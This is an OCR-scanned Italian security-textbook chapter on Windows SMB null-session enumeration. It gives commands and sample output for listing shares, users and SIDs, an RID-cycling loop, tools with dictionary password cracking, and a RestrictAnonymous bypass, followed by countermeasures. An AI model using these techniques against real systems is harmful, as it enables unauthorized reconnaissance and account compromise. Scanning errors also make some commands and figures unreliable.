Sessioni nulle: il deus ex machina dell’enumerazione 


Se vi è già capitato di accedere a un file o stampare su una stampante associata a 
una macchina Windows su una rete, probabilmente avete utilizzato il protocollo 
SMB (Server Message Block) di Microsoft, che costituisce la base della condivisione 
file e stampanti di Windows (c'è anche un’implementazione di SMB per Linux chia- 
mata Samba), L'SMB è accessibile tramite alcune API che possono restituire infor- 
mazioni interessanti su Windows, anche a utenti non autenticati. La qualità delle in- 
formazioni che possono essere raccolte con questo meccanismo rende l'’SMB uno 
dei talloni di Achille di Windows, se non viene adeguatamente protetto. 

Per illustrare gli effetti devastanti che possono derivare dalla mancata protezione 
dell’$MB, utilizziamo alcune tecniche di hacking ben note che sfruttano il protocol- 
lo, Il primo passo dell’enumerazione SMB consiste nel connettersi al servizio utiliz- 
zando il cosiddetto comando di “sessione nulla”, mostrato di seguito: 


C:\>net use \\192.168.202.33\IPC$ "" /u:"" 


Questo comando si collega alla “condivisione” nascosta per la comunicazione inter- 
processo (IPC$) all'indirizzo IP 192.168.202.33 utilizzando l'utente anonimo prede- 
finito (/user:"") e una password nulla (""). Se va a buon fine, l’aggressore riesce 
ad aprire un canale su cui tentare le varie tecniche riportate in questo capitolo e da 
cui estorcere al bersaglio il maggior numero di informazioni possibili: dati sulla rete, 
condivisioni, utenti, gruppi, chiavi del Registro di sistema e così via. Anche se non 
avete mai sentito parlare della vulnerabilità “Red Button”, delle connessioni a ses- 
sione nulla, o del logon anonimo, questa è l'intrusione in una rete dagli effetti più 
devastanti, come dimostreremo immediatamente con dovizia di particolari. 


BIOS) sia sulla TCP 445 (SMB su TCPAP, detta anche “Direct Host"), En- 
trambe le porte forniscono l'accesso allo stesso servizio (SMB), sia pure in 
modi diversi. Parleremo della TCP 445 nel prosieguo di questo capitolo. 


L* L’enumerazione SMB può essere effettuata sia sulla TCP 139 (sessione Net- 


Enumerazione delle condivisioni file 


Tra i bersagli preferiti dagli intrusi ci sono le condivisioni file di Windows con ACL 
non configurate correttamente. Dopo aver stabilito una sessione nulla, possiamo 
enumerare molto facilmente i nomi delle condivisioni file ricorrendo a diverse tec- 
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niche. Per esempio, il comando net view incorporato in Windows può essere uti 
lizzato per enumerare condivisioni su sistemi remoti: 

C:\>net view \\vito 


Shared resources at \\192.168.7.45 


VITO 

Share name Type Used as Comment 

NETLOGON Disk Logon server share 
Test Disk Public access 


The command completed successfully. 


Sono disponibili altri tre validi tool del Resource Kit di enumerazione delle condivisio- 
ni: rmtshare, srvcheck e srvinfo (che utilizza switch -s). rmtshare genera un out- 
put simile a quello di net view. srvcheck visualizza condivisioni e utenti autorizzati, 
comprese le condivisioni nascoste, ma richiede l’accesso privilegiato al sistema remo- 
to per enumerare utenti e condivisioni nascoste. Il parametro -s di srvinfo elenca le 
condivisioni assieme a numerose altre informazioni potenzialmente illuminanti. 

Uno dei migliori strumenti per enumerare le condivisioni di NT (e molto altro) è 
DumpSec (già DumpACLÌ, visibile nella Figura 3.2. Esso è disponibile gratuitamente 
sul sito di Somarsoft (http://www. somarsoft.com). Sono pochi gli strumenti che 
meritano più di DumpSec un posto tra gli attrezzi dell'amministratore della sicurez- 
za in ambiente NT. Questo programma controlla tutto, dalle autorizzazioni sul file 
system ai servizi disponibili sui sistemi remoti. È possibile ottenere una serie di in- 
formazioni elementari sugli utenti anche utilizzando una semplice connessione nul- 
la: è previsto il funzionamento da riga di comando, che semplifica l'automazione e 
l'utilizzo da script. Nella Figura 3.2 viene mostrato l'utilizzo di DumpSec per scarica- 
re informazioni di condivisione da un computer remoto. 

L'apertura di connessioni nulle e l'utilizzo manuale degli strumenti illustrati nei pa- 
ragrafi precedenti è un'ottima tecnica per attacchi mirati, ma la maggior parte degli 
hacker preferisce utilizzare prima un programma di scansione NetBIOS per rilevare 
eventuali condivisioni a rischio. Uno degli strumenti più apprezzati è Legion (dispo- 
nibile su molti archivi Internet), visibile nella figura seguente. 


Legion 

= 5 192168202.30 
<> TEST 
cy RSA 
9 JOEL 

= 1} 15216820232 
> TEST 
© RSA 
© JOEL 

= 2} 192.168.202 33 


(=) 
c TEMP 


Show BF Tool 
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Legion può passare al setaccio una rete IP di Classe C e riportare sulla propria inter- 
faccia grafica tutte le condivisioni disponibili. La versione 2.1 comprende uno stru- 
mento per operare con il metodo della “forza bruta”, per cercare di collegarsi a una 
data condivisione utilizzando un elenco di password fornito dall'utente. Per mag- 
giori informazioni sugli attacchi a forza bruta contro Windows 9x e NT, vi rimandia- 
mo rispettivamente ai Capitoli 4 e 5. 


Somarsoft DumpS 5 ec Milani aly Dump Ac N) 


NET LI OGON 


ADMINS ==>access denied | 


IPC$ ==>)access denied | 
mspclnt ==)access denied 
c$ ==>access denied 
D$ ==)access denied 
(SS ==>access denied 
General ==)access denied 


IBMPropr ==)access denied 


® puis = 


Figura 3.2 
DumpSec rivela le condivisioni su una sessione nulla con il computer bersaglio. 


Un altro scanner di condivisioni per Windows è il NAT (NetB/OS Auditing Tool), ba- 
sato su codice scritto da Andrew Tridgell e disponibile sul sito Web di Hacking 
Exposed (http://www.hackingexposed.com). Neon Surge e Chameleon dell'ormai 
defunto gruppo di sicurezza di Rhino9 hanno realizzato per NAT un'interfaccia gra- 
fica, per utenti allergici alla linea di comando, visibile nella Figura 3.3. NAT non si 
limita a trovare le condivisioni, ma tenta un accesso forzato sulla base di elenchi di 
nomi utente e password dell’utente. 


\NetBIOS\WATAnat exe 
Tx]-- Unable to connect 


D-\app 


] 


\[x]}— Attempting to connect with name: * 
[x] Unable to connect 
[x]--- Attempting to connect with name: * 
.[*x]—- Unable to connect 


Ia} Rernetioa to connect with name: «SMBSERVER 
[x] Unable to connect 


[=] fittempting to connect with name: SMBSERVER 


Bee” Unable to connect pi ae 
[x] fittempting to connect with name: * [D-Vapps NetBIOSKNAT\PASSUIS. 
[=] Unable to connect Word List D:Aapps\NetBIOS\NAT\PASSLIS 


[*]}-—— Was not able to obtain any information from remote server d0 AEENZI 


[=] Checking host: 192.168.202 .31 

[=]}--- Obtaining list of remote NetBIl0S names 

{*]}- Vas not able to obtain any information from remote server È 7 

i[»]--- Checking host: 192.168.202.32 Tani î È 

pre Obtaining list of remote NetBIOS names Starting IP pp isa | 
0 O 

Figura 3.3 


Gli output grafico e a riga di comando di NAT (NetBIOS Auditing Tool). 
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Enumerazione del registro 


Un altro valido metodo di enumerazione di informazioni sulle applicazioni della fa- 
miglia NT risiede nel dump del contenuto del Registro di sistema della macchina 
Windows bersagliata. La maggior parte delle applicazioni installate correttamente su 
un determinato sistema NT lasciano tracce nel Registro; si tratta solo di sapere dove 
cercare. Inoltre, gli intrusi che riescono ad accedere al Registro possono centellinare 
le numerose informazioni correlate agli utenti e alla configurazione. Con un po' di 
pazienza, generalmente è possibile trovare qualche dato che consenta di accedere ai 
suoi labirinti. Per fortuna, la configurazione di default di Windows consente solo agli 
amministratori di accedere al Registro (perlomeno nelle versioni Server). Pertanto, le 
tecniche descritte di seguito generalmente non funzioneranno con sessioni nulle 
anonime. C'è però un'eccezione, quando la chiave HKLM\System\CurrentControl- 
Set\Control\SecurePipeServer\Winreg\AllowedPaths specifica che altre chiavi sono 
accessibili tramite sessioni nulle. Di default, questo consente l’accesso a HKLM\Soft- 
ware\Microsoft\WindowsNT \Current Version\. 

I tool migliori per verificare se un Registro remoto è bloccato sono regdmp di RK e, 
ancora una volta, DumpSec di Somarsoft. regdmp è un'utility piuttosto spartana che 
si limita a scaricare l’intero Registro (o singole chiavi specificate dalla riga di coman- 
do) sulla console. Sebbene l’accesso remoto al Registro sia generalmente limitato 
agli amministratori, i malintenzionati cercheranno probabilmente di enumerare co- 
munque varie chiavi, nella speranza di un colpo di fortuna. In questo esempio con- 
trolliamo quali applicazioni sono avviate con Windows. In casi come questo, spesso 
gli hacker inseriscono puntatori alle utility backdoor quali NetBus (Capitoli 5 e 14): 


C:\>regdmp -m \\192.168.202.33 HKEY_LOCAL_MACHINE\SOFTWARE \ 
Microsoft\Windows\CurrentVersion\Run 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 
SystemTray = SysTray.Exe 
BrowserWebCheck = loadwc.exe 


DumpSec genera un output molto più ricco, ma sostanzialmente effettua la stessa 
operazione, come mostrato nella Figura 3.4. Il report “Dump Services” enumererà 
ogni servizio Win32 e kernel driver sul sistema remoto, anche se esso non è in ese- 
cuzione (anche in questo caso, assumiamo che l’intruso abbia le opportune autoriz- 
zazioni di accesso). Questo può suggerire agli aggressori numerosi potenziali bersa- 
gli tra cui scegliere nella fase di pianificazione di un attacco. Rammentate che per 
questa attività occorre una sessione nulla. 


Enumerazione di domini di fiducia 


Vi ricordate del tool nltest, di cui abbiamo parlato in precedenza a proposito 
dell’enumerazione del servizio nomi NetBIOS? Una volta che una sessione nulla 
viene impostata su una delle macchine facenti parte del dominio enumerato, è pos- 
sibile utilizzare la sintassi nltest /server:<server_name> e /trusted_ domains 
per raccogliere ulteriori informazioni su altri domini Windows correlati al primo. È 
incredibile quanto questi semplici tool possano aumentare di potenza quando è di- 
sponibile una sessione nulla. 


Enumerazione di utenti 


A questo punto, può dispiacere rinunciare alle informazioni sulle condivisioni, ma 
non è la fine del mondo; perlomeno, gli aggressori non sono riusciti a carpire le in- 
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€: Somarsott DumpAcl - \\192.168.202.33 (-_1OLx| 

Ele Edi Search Bepot_ View Help 
lendlyName Name St jp' Accoun 

Inport Inport Stopped Kernel ai 
Jazzg300 Jazzg300 Stopped Kernel 

Jazzg364 Jazzg364 Stopped Kernel 

Jzux148% Jzux148% Stopped Kernel 

Keyboard Class Driver Kbdclass Running Kernel 

KSecDD KSecDDbD Running Kernel 

Messenger Messenger Running Win32 LocalSystem 

mga nga Stopped Kernel 

mga_mil mga_mil Stopped Kernel 

Microsoft NDIS System Driver NDIS Running Kernel 

mitsumi mitsumi Stopped Kernel 

mkecr5xx mKecr5xx Stopped Kernel | 

Moden tiodem Stopped Kernel | 
Mouse Class Driver Mouclass Running Kernel 

Msfs Msfs Running Kernel | 

Mup Mup Running Kernel | 

Ncer53c9x Ncr53c9x Stopped Kernel se 

ncr77c22 ner77c22 Stopped Kernel 

Ncrc7 00 Ncrc709 Stopped Kernel 

Ncrc719 Ncrc719 Stopped Kernel 

Net Logon Netlogon Stopped Win32 Local$System 

NetBIOS Interface NetBIOS Running Kernel 

NetDetect NetDbetect Stopped Kernel 

Network DDE Net DDE Stopped Win32 LocalSystem 

Network DDE DSDM Net DDEdsdn Stopped Win32 LocalSystem 

Npfs Npfs Running Kernel 

NT LM Security Support Provider NtLnSsp Stopped Win32 LocalSystem 

Ntfs Ntfes Stopped Kernel 

Null Null Running Kernel bi 
Figura 3.4 


DumpSec enumera tutti i servizi e le unità disco in esecuzione su un sistema remoto, 


formazioni sugli account utente, giusto? No, sbagliato. Purtroppo, nelle sessioni nul- 
le le macchine Windows mettono a disposizione informazioni sugli utenti con la 
stessa facilità con cui rivelano le condivisioni. 

Ancora una volta, DumpSec si rivela uno dei tool più potenti per carpire informa- 
zioni sugli utenti in una sessione nulla. Questa utility è in grado di estrarre una lista 
di utenti, gruppi, politiche e diritti degli utenti del sistema NT. Nell'esempio seguen- 
te, utilizzeremo DumpSec dalla riga di comando per generare un file contenente in- 
formazioni sugli utenti estratte dal computer remoto (ricordate che per poter fun- 
zionare DumpSec richiede una sessione nulla con il computer bersaglio): 


C:\>dumpsec /computer=\\192.168.202.33 /rpt=usersonly 
/saveas=tsv /outfile=c:\temp\users.txt 

C:\>cat c:\temp\users.txt 

4/3/99 8:15 PM - Somarsoft DumpSec - \\192.168.202.33 


UserName FullName Comment 

barzini Enrico Barzini Rival mob chieftain 

godfather Vito Corleone Capo 

godzilla Administrator Built-in account for administering the 
domain 

Guest Built-in account for guest access 
lucca Lucca Brazzi Hit man 

mike Michael Corleone Son of Godfather 


Utilizzando la GUI di DumpSec, è possibile includere nel rapporto un numero note- 
volmente superiore di campi di informazioni, ma generalmente il formato appena 
mostrato consente di individuare la fonte dei problemi. Per esempio, una volta ab- 
biamo osservato un server su cui la password per l'account Administrator era me- 
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morizzata nel campo Comments! RestrictAnonymous impedirà a DumpSec di recu- 
perare questa informazione. 

Sono disponibili altri due tool di enumerazione Windows estremamente potenti: 
sid2user e user2sid di Evgenii Rudnyi (http://ww.chem.msu.su:8080/-ru- 
dnyi/NT/sid.txt). Si tratta di tool a riga di comando che cercano di risalire al SID 
di un sistema della famiglia NT dall’input del nome utente e viceversa. Il SID è 
l'identificatore di sicurezza, un valore numerico di lunghezza variabile inviato a un 
sistema della famiglia NT all’atto dell’installazione. Consigliamo di leggere l’eccel- 
lente articolo di Mark Russinovich sulla struttura e sulla funzione dei SID, all’indiriz- 
zo http://ww.win2000mag.com/Articles/Index.cfm?ArticleID=3143. Una vol- 
ta che il SID di un dominio è stato individuato tramite user2sid, l’intruso può utiliz- 
zare numeri di SID noti per enumerare i corrispondenti nomi utente. Ecco un esem- 


pio: 
C:\>user2sid \\192.168.202.33 "domain users" 


S-1-5-21-8915387-1645822062 - 1819828000-513 


Number of subauthorities is 5 
Domain is WINDOWSNT 

Length of SID in memory is 28 bytes 
Type of SID is SidTypeGroup 


In questo modo è possibile conoscere il SID per la macchina, la stringa di numeri che 
iniziano con $S-1, separati da trattini, La stringa numerica che segue l’ultimo trattino è 
chiamata identificatore relativo (RID); esso è predefinito per utenti e gruppi incorpo- 
rati in Windows quali Administrator e Guest. Per esempio, il RID dell’utente Admini- 
strator è sempre 500, mentre quello dell'utente Guest è sempre 501. Un aggressore 
che sia venuto in possesso di queste informazioni può utilizzare sid2user e la stringa 
SID nota a cui sia accodato un RID pari a 500, per trovare il nome dell’account 
dell’amministratore (anche se esso è stato rinominato). Ecco un esempio: 


C:\>sid2user \\192.168.2.33 5 21 8915387 1645822062 18198280005 500 
Name is godzilla 


Domain is WINDOWSNT 
Type of SID is SidTypeUser 


Notate che “S-1” e i trattini sono stati omessi. Altro aspetto interessante: al primo ac- 
count creato su qualsiasi sistema locale o dominio basato su NT è assegnato un RID 
pari a 1000 e a ciascun oggetto seguente viene assegnato il numero sequenziale 
successivo (1001, 1002, 1003 e così via; i RID non vengono riutilizzati sull’attuale in- 
stallazione). Pertanto, una volta che l'aggressore conosce il SID, è in grado di enu- 
merare ogni utente e gruppo, passato e presente, su un sistema della famiglia NT, 


@& > sid2user funziona anche se RestrictAnonymous viene impostato a 1 (lo 
Ro spiegheremo tra breve), purché sia accessibile la porta 139 0 445. Un fatto 
allarmante! 


Ecco un semplice esempio di come utilizzare user2sid e sid2user in uno script per 
analizzare ciclicamente tutti gli account utente disponibili su un sistema. Prima di ese- 
guire questo script, individuiamo il SID per il sistema bersaglio utilizzando user2sid 
in una sessione nulla, come mostrato in precedenza. Ricordando che nei sistemi della 
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famiglia NT ai nuovi account viene assegnato un RID che inizia per 1000, possiamo 
eseguire il ciclo seguente utilizzando il comando di shell for della famiglia NT e il 
tool sid2user, per enumerare fino a cinquanta account su una macchina bersaglio: 


C:\>for /L %i IN (1000,1,1050) DO sid2user \\acmepdc1 5 21 1915163094 
1258472701648912389 %I >> users.txt 
C:\>cat users.txt 


Name is IUSR_ACMEPDCI 
Domain is ACME 
Type of SID is SidTypeUser 


Name is MTS Trusted Impersonators 
Domain is ACME 
Type of SID is SidTypeAlias 


Questo output piuttosto elementare può essere raffinato incanalandolo in un filtro, 
per ottenere unicamente una lista di nomi utenti. Ovviamente, l’ambiente di scrip- 
ting non è limitato alla shell di NT (Perl, VBScript, o altri ambienti). Un ultimo av- 
vertimento prima di proseguire: tenete presente che in questo esempio il dump de- 
gli utenti verrà effettuato con successo solo se la porta TCP 139 o 445 rimane aperta 
sulla macchina bersaglio, malgrado RestrictAnonymous impostato a 1. 


Il tool UserDumbp, illustrato nel paragrafo successivo, puntato sulla TCP 445 
LA consente di automatizzare questa tecnica di enumerazione, il cosiddetto 
“giro panoramico dei SID”. 


Tool di enumerazione a sessione nulla onnicomprensivi 


Il team Razor di BindView è riuscito a includere quasi tutte le funzionalità di enu- 
merazione SMB in un unico tool. Questo tool è chiamato enum e può essere scarica- 
to all'indirizzo http://razor.bindview.com. L'elenco seguente di switch per riga 
di comando disponibili per questo tool offre un'idea di quanto sia esaustivo: 


C:\>enum 

usage: enum [switches] [hostname|ip] 
-U: get userlist 
-M: get machine list 
-N: get namelist dump (different from -U|-M) 
-S: get sharelist 
-P: get password policy information 
-G: get group and member list 
-L: get LSA policy information 
-D: dictionary crack, needs -u and -f 
-d: be detailed, applies to -U and -S 
-C: don't cancel sessions 
-u: specify username to use (default "") 
-p: specify password to use (default "") 
-f: specify dictfile to use (wants -D) 


enum consente addirittura di automatizzare il settaggio e lo smantellamento di ses- 
sioni nulle. Di particolare interesse lo switch di enumerazione della politica delle 
password, -P, che indica all’aggressore se può identificare a distanza le password 
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degli account utente (utilizzando -D -u e -f) fino a individuarne una debole. 
L'esempio seguente, modificato per motivi di spazio, mostra enum in azione: 


C:\>enum -U -d -P -L -c 172.16.41.10 
server: 172.16.41.10 
setting up session... success. 
password policy: 

min length: none 


lockout threshold: none 
opening lsa policy... success, 
names: 

netbios: LABFARCE.COM 

domain: LABFARCE.COM 


trusted domains: 


SYSOPS 
PDC: CORP-DC 
netlogon done by a PDC server 
getting user list (pass 1, index 0)... success, got 11. 


Administrator (Built-in account for administering the computer/domain) 
attributes: 

chris attributes: 

Guest (Built-in account for guest access to the computer/domain) 
attributes: disabled 


keith attributes: 
Michelle attributes: 


enum effettuerà inoltre l’identificazione remota delle password, un utente alla volta, 
utilizzando gli argomenti -D -u <username> -f <dictfile>. 

nete è meno diffuso di enum, ma è consigliabile procurarselo. Scritto da Sir Dystic di 
Cult of the Dead Cow, nete estrae diverse informazioni da una connessione a ses- 
sione nulla. Rinunciamo per motivi di spazio a utilizzare lo switch /0 per effettuare 
tutte quante le verifiche; di seguito è elencata la sintassi dei comandi di nete, che 
consente di farsi un'idea dell’ampiezza delle informazioni che questo tool può recu- 
perare tramite una sessione nulla: 


C:\>nete 
NetE v.96 Questions, comments, etc. to sirdystic@cultdeadcow.com 


Usage: NetE [Options] \\MachinenameOrIP 
Options: 

/® - All NULL session operations 

/A - All operations 

/B - Get PDC name 

/C - Connections 

/D - Date and time 


/E - Exports 
/F - Files 
/G - Groups 


/I - Statistics 
/J - Scheduled jobs 
/K - Disks 
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{L - Local groups 

{IM - Machines 

IN - Message names 

/Q - Platform specific info 
/P - Printer ports and info 
/R - Replicated directories 
/S - Sessions 

/T - Transports 

/U - Users 

/V - Services 

/W - RAS ports 

/X - Uses 

/Y - Remote registry trees 
/Z - Trusted domains 


Altri tool di enumerazione a sessione nulla 


Occorre segnalare anche qualche altro tool di enumerazione per la famiglia NT. Uti- 
lizzando una sessione nulla, getmac visualizza gli indirizzi MAC e i nomi dei dispo- 
sitivi delle schede di interfaccia di rete presenti su macchine remote. Esso può fomi- 
re informazioni utili sulla rete a un aggressore che ispeziona un sistema con diverse 
interfacce di rete. getmac funziona anche se RestrictAnonymous è impostato a 1. 
Sono poi disponibili altri tool di enumerazione degli utenti, quali le utility usrstat, show- 
grps, locali e globali di Reskit, che possono fomire ulteriori informazioni sugli utenti. 
winfo di Arne Vidstrom, scaricabile all'indirizzo http://ww.ntsecurity.nu, estrae 
account utente, condivisioni e account fidati di interdomini, server e workstation. 
Esso consente persino di automatizzare la creazione di una sessione nulla, se lo de- 
siderate, mediante lo switch -n. 

nbtdump di David Litchfield di Cerberus Information Security (http://www. cerbe- 
rus-infosec.co.uk/tool.shtml) consente di creare sessioni nulle, effettuare l'enu- 
merazione di condivisioni e account utente e persino di generare l’output sotto for- 
ma di un rapporto HTML con ottima leggibilità. 


Contromisure alle sessioni nulle 


Le sessioni nulle richiedono l’accesso alla porta TCP 139 (e/o alla 445 su Win 2000); 
pertanto il metodo più semplice per bloccare l’accesso alle informazioni è filtrare le 
porte TCP e UDP da 139 e 145 su tutti i dispositivi di accesso alla rete. È anche pos- 
sibile disattivare del tutto i servizi SMB sui singoli host NT 3/4x annullando l’asso- 
ciazione del client WINS (TCP/IP) dall'interfaccia appropriata, ricorrendo alla sche- 
da Bindings delle proprietà della rete dal Pannello di controllo. In Win 2000, questo 
può essere facilmente ottenuto annullando l’opzione File and Print sharing from 
Microsoft Networks dalla giusta scheda, entrando nell'applet Network and Dial-up 
Connections, e selezionando la voce di menu Advanced/ Advanced Settings. 
A partire da Service Pack 3 di NT 4, Microsoft ha messo a disposizione un meccani- 
smo per impedire l'’enumerazione di informazioni importanti su sessioni nulle, sen- 
za che sia necessario disabilitare SMB dalle interfacce di rete (sebbene raccoman- 
diamo ancora di disabilitarle a meno che i servizi SMB non siano necessari). Questo 
strumento è chiamato RestrictAnonymous, dal nome di una chiave del Registro di 
sistema. Per utilizzarlo è sufficiente applicare la procedura seguente. 

1. Aprite il Registro di sistema, mediante il comando regedt32 e portatevi sul- 

la cartella HKE5Y_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA. 


88 Capitolo 3 


2. Selezionate EdiV/Add Value e inserite i dati elencati nella tabella seguente. 


Value Name (Nome del valore): RestrictAnonymous 
Data Type (Tipo di dati): REG_DWORD 
Value (Valore): 1 (0 2 in Win2000) 


3. Chiudete l’Editor del Registro di sistema e riavviate il computer per rendere 
effettiva la modifica. 

In Windows 2000 la correzione è leggermente più semplice da implementare, grazie a 
Security Policies, che fornisce un’interfaccia grafica per le impostazioni di sicurezza più 
ostiche del Registro di sistema, come per esempio RestrictAnonymous, che dovevano 
essere configurate manualmente in NT4. Ancora meglio, queste impostazioni sono ap- 
plicabili a livello di QU (Organizational Unit), sito o dominio, in modo che possano 
essere ereditate da tutti gli oggetti-figlio in Active Directory se applicate da un control- 
lore di dominio Win 2000, Questo procedimento richiede l'estensione Group Policy. 
Per ulteriori informazioni su Group Policy, fare riferimento al Capitolo 5. 
È interessante notare come l'impostazione di questo valore a 1 in realtà non blocchi le 
connessioni anonime; piuttosto, si limita a ridurre le informazioni disponibili sulle con- 
nessioni nulle, soprattutto l’enumerazione degli account utente e delle condivisioni. 


Alcuni strumenti e tecniche di enumerazione estrarranno sempre dati ri- 
servati dai sistemi remoti anche se RestrictAnonymous è impostato a 1, 
quindi non fidatevi troppo. 


Impostare RestrictAnonymous a 2 impedisce che il gruppo Everyone venga incluso 
nei token di accesso anonimo. Questa impostazione blocca in modo efficace la crea- 
zione di sessioni nulle: 


C:\>net use \\mgmgrand\ipc$ “" /u:"" 
System error 5 has occurred. 


Access is denied. 


ra Questa impostazione può causare problemi di connettività a client a livello 
| basso e prodotti di terze parti e/o piattaforme Windows non recenti. L’utility 
dsclient, inclusa in Windows 2000, consente di aggiornare i client Win- 
dows 95 per mitigare questo problema. Per ulteriori dettagli, consultate l'ar- 

ticolo 0246261 del Knowledge Database di Microsoft. 


Superare RestrictAnonymous = | 


Non sentitevi troppo sicuri con RestrictAnonymous: la comunità degli hacker ha 
scoperto che interrogando la chiamata API NetserGetInfo al Livello 3, RestrictA- 
nonymous = 1 può essere superato. Lo strumento userinfo, disponibile all'indirizzo 
http://www.HammerofGod.com/download.htm, enumererà le informazioni utente su 
una sessione nulla anche se RestrictAnonymous è impostato a 1. (Ovviamente, se 
RestrictAnonymous è impostato a 2 su un sistema Windows 2000, le sessioni nulle 
non sono neanche possibili.) Ecco come userinfo enumera l'account Administrator, 
su un sistema remoto con RestrictAnonymous impostato a 1: 


C:\>userinfo \\victom.com Administrator 
UserInfo v1.5 - thor@HammerofGod.com 
Querying Controller \\mgmgrand 


USER INFO 
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Username: Administrator 

Full Name: 

Comment: Built-in account for administering the computer/domain 
User Comment: 

User ID: 500 

Primary Grp: 513 

Privs: Admin Privs 


OperatorPrivs: No explicit OP Privs 


SYSTEM FLAGS (Flag dword is 66049) 
User's pwd never expires. 


MISC INFO 

Password age: Mon Apr 09 01:41:34 2001 
LastLogon: Mon Apr 23 09:27:42 2001 
LastLogoff: Thu Jan 01 00:00:00 1970 
Acct Expires: Never 

Max Storage: Unlimited 

Workstations: 


UnitsperWeek: 168 
Bad pw Count: (0) 
Num logons: 5 
Country code: (o) 
Code page: (0) 
Profile: 
ScriptPath: 

Homedir drive: 

Home Dir: 
PasswordExp: (0) 


Logon hours at controller, GMT: 


Hours - 12345678901N12345678901M 
Sunday 111111111111111111111111 
Monday 111111111111111111111111 
Tuesday 111111111111111111111111 
Wednesday 111111111111111111111111 
Thursday 111111111111111111111111 
Friday 111111111111111111111111 
Saturday 1111119111111 1ITITTTTTTITI 


Get hammered at HammerofGod.com! 


Uno strumento correlato fornito da HammerofGod.com è userdump, che enumera il 
SID del sistema remoto e quindi scorre i valori RID previsti per raccogliere tutti i 
nomi degli account utente. userdump prende il nome di un utente o gruppo noto, 
ed esegue un numero di ricerche specificato dall'utente nei SID da 1001 in su. 
userdump otterrà sempre per prima cosa il RID 500 (Administrator), quindi ripartirà 
dal RID 1001 aggiungendo il numero massimo di interrogazioni specificate, Impo- 
stando “MaxQueries” uguale a 0 0 vuoto si enumereranno solo i SID 500 e 1001.) 
Un esempio di utilizzo di userdump è il seguente: 


C:\>userdump \\mgmgrand guest 10 
UserDump v1.11 - thor@HammerofGod.com 


Querying Controller \\mgmgrand 
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USER INFO 
Username: Administrator 
Full Name: 
Comment: Built-in account for administering the computer/domain 
User Comment: 
User ID: 500 
Primary Grp: 513 
Privs: Admin Privs 
OperatorPrivs: No explicit OP Privs 
[snip] 


LookupAccountSid failed: 1007 does not exist... 
LookupAccountSid failed: 1008 does not exist... 
LookupAccountSid failed: 1009 does not exist... 


Get hammered at HammerofGod.com! 


Un altro strumento, GetAcct di Urity, disponibile all'indirizzo http://ww.security- 
friday.com/, utilizza la stessa tecnica. GetAcct dispone di un'interfaccia grafica e può 
esportare i risultati su un file separato da virgole, per consentire un'analisi successiva. 
Inoltre, non richiede la presenza di un account Administrator o Guest sul server tar- 
get. Di seguito viene mostrata l'interfaccia di GetAcct, mentre raccoglie informazioni 
sugli account utente da un sistema con RestrictAnonymous impostato a 1. 


È GetAcct Pili 


File View Help 


Remote Computer End of RID Doma: 


Built-in ac Odays Oh Cuest 
TsInternetU TsInternetU This user a Odays 0h Cuest 


IUSR MGMGRA Internet Gu Built-in ac Built-in ac Z8days 8]Guest 
IWAM MGNGRA Launch IIS Built-in ac Built-in ac 28days 8]Guest 


sfuuser sfuuser User accoun 16days L:User 


Modifiche apportate a RestrictAnonymous in Windows XP/.NET Server 


Come abbiamo spiegato, in Windows 2000 l'impostazione RestrictAnonymous = 2 
impedisce agli utenti null di collegarsi alla condivisione IPC$. Tuttavia, questo ha 
un effetto deleterio, in quanto impedisce l’accesso ai client a livello basso e l’enu- 
merazione dei domini di fiducia (i client Windows 95 possono essere aggiornati 
mediante l’utility dsclient in modo da mitigare questo problema; per maggiori det- 
tagli, leggete l'articolo Q246261 del Knowledge Database di Microsoft). L'interfaccia 
per il controllo dell'accesso anonimo è stata però ridisegnata in Windows XP/.NET 
per ottenere un numero superiore di opzioni controllate da RestrictAnonymous. 

La modifica più facilmente visibile quando si osserva il nodo Security Options della 
Security Policy è la mancanza dell’opzione “No Access Without Explicit Anonymous 
Permissions” (equivalente all'impostazione di RestrictAnonymous = 2 in Windows 
2000). Con XP/.NET Server, tutte le impostazioni facenti capo a Security Options 
sono state organizzate in categorie. Le impostazioni relative alle restrizioni per l’ac- 
cesso anonimo rientrano nella categoria dotata del prefisso “Network Access:”. La 
Tabella 3.2 mostra le nuove impostazioni di XP/.NET e le configurazioni consigliate. 
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Esaminando la Tabella 3.2, risulta evidente che il principale vantaggio di Windows 
XP/.NET risiede nel controllo più dettagliato delle risorse accessibili tramite sessioni 
nulle. Fornire un numero maggiore di opzioni va benissimo, ma continuiamo ad ap- 
prezzare l'elegante semplicità di RestrictAnonymous = 2 di Windows 2000, poiché 
le sessioni nulle erano semplicemente impossibili. Ovviamente, la compatibilità ne 
risentiva: dopotutto siamo al servizio della sicurezza, no? Microsoft dovrebbe ripor- 
tare in vita l'opzione più spartana, a beneficio di coloro che preferiscono l’essenzia- 
lità. A ogni modo, non siamo riusciti a penetrare nelle impostazioni illustrate nella 
Tabella 3.2 utilizzando tool recenti. 


LI 


Accertatevi che il Registro sia bloccato 


Non dimenticate di verificare che la politica di sicurezza sia applicata, fa- 
cendo clic con il tasto destro del mouse sul nodo Security Settings în MMC e 
selezionando Reload, oppure aggiornando la politica di gruppo su un do- 
minio. 


Le impostazioni per l’accesso anonimo non si applicano all'accesso remoto al Registro 
(sebbene, come avete visto, vi sia un'impostazione separata per esso nella politica di 
sicurezza di Windows XP/.NET Server). Accertatevi che il Registro sia bloccato e che 
non risulti accessibile a un utente remoto. La chiave opportuna per verificare la possi- 
bilità di accesso remoto al Registro è HKLM\Sistemi\CurrentControlSet\ControSe- 
curePipeServer\Winreg, con le sue sottochiavi associate. Se questa chiave è presente, 
l’accesso remoto al Registro è consentito unicamente agli amministratori. Essa è pre- 
sente di default nei prodotti Windows NT Server, ma non in quelli Workstation. La 
sottochiave opzionale AllowedPaths definisce percorsi specifici per entrare nel Regi- 
stro a cui è consentito l’accesso, indipendentemente dalla protezione sulla chiave 
Winreg del Registro. Anch’essa deve essere controllata. Una lettura consigliata è l’arti- 
colo Q153183 di Microsoft Knowledge Base, consultabile all'indirizzo http://sear- 
ch. support.microsoft.com. Servitevi inoltre di eccellenti tool quale DumpSec per 
effettuare voi stessi alcune verifiche, e assicuratevi che non trapelino informazioni. 


Tabella 3.2 = Impostazioni dell'accesso anonimo su Windows XP/.NET e Windows 2000 


Impostazione di XP/.NET 


Accesso alla rete: consentire la conversione 
anonima SID/nome. 

Accesso alla rete: non consentire l’enumera- 
zione anonima degli account SAM. 

Accesso alla rete: non consentire l'enumera- 
zione anonima di account SAM e condivisioni. 
